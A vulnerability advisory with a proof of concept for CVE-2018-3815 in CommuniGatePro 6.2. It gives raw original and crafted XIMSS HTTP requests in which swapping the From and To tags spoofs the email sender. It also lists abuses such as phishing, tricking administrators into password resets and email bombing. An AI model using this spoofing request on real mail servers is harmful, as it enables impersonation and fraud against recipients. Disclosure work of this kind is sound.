CommuniGatePro 6.2 Missing XIMSS Tag Validation

2018.01.06
Risk: Low
Local: No
Remote: Yes
CWE: CWE-287


CVSS Base Score: 3.5/10
Impact Subscore: 2.9/10
Exploitability Subscore: 6.8/10
Exploit range: Remote
Attack complexity: Medium
Authentication: Single time
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

# Exploit Title: CommuniGatePro 6.2 - Missing XIMSS tags validation # Date: 02/01/2018 # Exploit Author: Boumediene KADDOUR # Unit: Algerie Telecom R&D Unit # Vendor Homepage: https://www.stalker.com/ # Software Link: http://www.stalker.com/ (paid product) # Version: 6.2.x < # Tested on: production server on crystal, pronto, pronto4, pronto5 and all other webmails. # CVE: CVE-2018-3815 ============= *Description:* ============= CommunigatePro XML Interface to Messaging, Scheduling, and Signaling protocol ("XIMSS") version 6.2 suffers from a Missing XIMSS protocol Validation attack that leads to an email spoofing attack. A malicious authenticated attacker will be able to craft the sending XIMSS request used to send an email via changing the <From></From> tags by <To></To> tags and vice versa, ending up sending an email from any source email of his/her choice e.g. billgate@microsoft.com to any destination email, which leads to receiving the email on the victim's INBOX. ========== *Impact:* ========== 1. An attacker can trick someone to click on malicious attachments (virus, malware...etc) from trusted sources (e.g. an email coming from CEO). 2. This trust can give an attacker the ability to request for crucial files or valuable reports from an employee in charge of a given service. 3. This trust can give an attacker the ability to request the mail administrator or system administrator to reset his/her password to a suggested one (mypassword123). 4. An attacker can perform an email bomb attack which is a form of network abuse consisting of sending huge volumes of email to an address in an attempt to overflow the mailbox. A good target can be the CEO's email address. 6. etc... ======================================================================== *Original request* ======================================================================== POST /Session/169095-AwcluJEFLAazFLAE521azfF-lls5cdc/sync?reqSeq=20&random=20 HTTP/1.1 Host: mail.victim-domain.com User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://mail.victim-domain.com/?Skin=hPronto- Content-Length: 747 Content-Type: application/xml;charset=UTF-8 Cookie: __utma=234654222.2016661159.2018875581.5355870481.1510505641.2; __utmz=89633334.1499870481.1.1.utmcsr=google|utmccn=( organic)|utmcmd=organic|utmctr=(not%20provided) Connection: close <XIMSS><folderOpen mailbox="Brouillons" mailboxClass="" folder="Brouillons-MM-1" sortField="INTERNALDATE" id="39"><field>Subject</field><field>INTERNALDATE</field></folderOpen><messageSubmit targetMailbox="ElAA(c)ments envoyAA(c)s" mailboxClass="" flags="Seen" dataset="RecentAddresses" id="40"><EMail charset="utf-8"><X-Mailer>CommuniGate Pronto! HTML5 6.2.3925</X-Mailer>*<To>billgate@microsoft.com <billgate@microsoft.com></To>*<Subject>POC</Subject><MIME-Version>1.0</MIME-Version><MIME type="text" subtype="plain" charset="utf-8" format="flowed">My PoC. --------------- Boumediene KADDOUR, OSCP, OSWP Cyber Security Researcher R&amp;D Mobile: 00213 661 000 000 </MIME>*<From* realName="Boumediene KADDOUR"*>* *snboumediene[AT]gmail[DOT]com**</From>*</EMail></messageSubmit></XIMSS> ========================================================================== Crafted Request: sending an email from billgate@microsoft.com to snboumediene[AT]gmail[DOT]com ========================================================================== POST /Session/169095-AwcluJEFLAazFLAE521azfF-lls5cdc/sync?reqSeq=20&random=20 HTTP/1.1 Host: mail.victim-domain.com User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://mail.victim-domain.com/?Skin=hPronto- Content-Length: 747 Content-Type: application/xml;charset=UTF-8 Cookie: __utma=234654222.2016661159.2018875581.5355870481.1510505641.2; __utmz=89633334.1499870481.1.1.utmcsr=google|utmccn=( organic)|utmcmd=organic|utmctr=(not%20provided) Connection: close <XIMSS><folderOpen mailbox="Brouillons" mailboxClass="" folder="Brouillons-MM-1" sortField="INTERNALDATE" id="39"><field>Subject</field><field>INTERNALDATE</field></folderOpen><messageSubmit targetMailbox="ElAA(c)ments envoyAA(c)s" mailboxClass="" flags="Seen" dataset="RecentAddresses" id="40"><EMail charset="utf-8"><X-Mailer>CommuniGate Pronto! HTML5 6.2.3925</X-Mailer><From>billgate@microsoft.com</From>< Subject>POC</Subject><MIME-Version>1.0</MIME-Version><MIME type="text" subtype="plain" charset="utf-8" format="flowed">My PoC. Regards </MIME>*<To* realName="Boumediene KADDOUR"*>snboumediene[AT]gmail[.]com <http://gmail.com></To>*</EMail></messageSubmit></XIMSS>


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top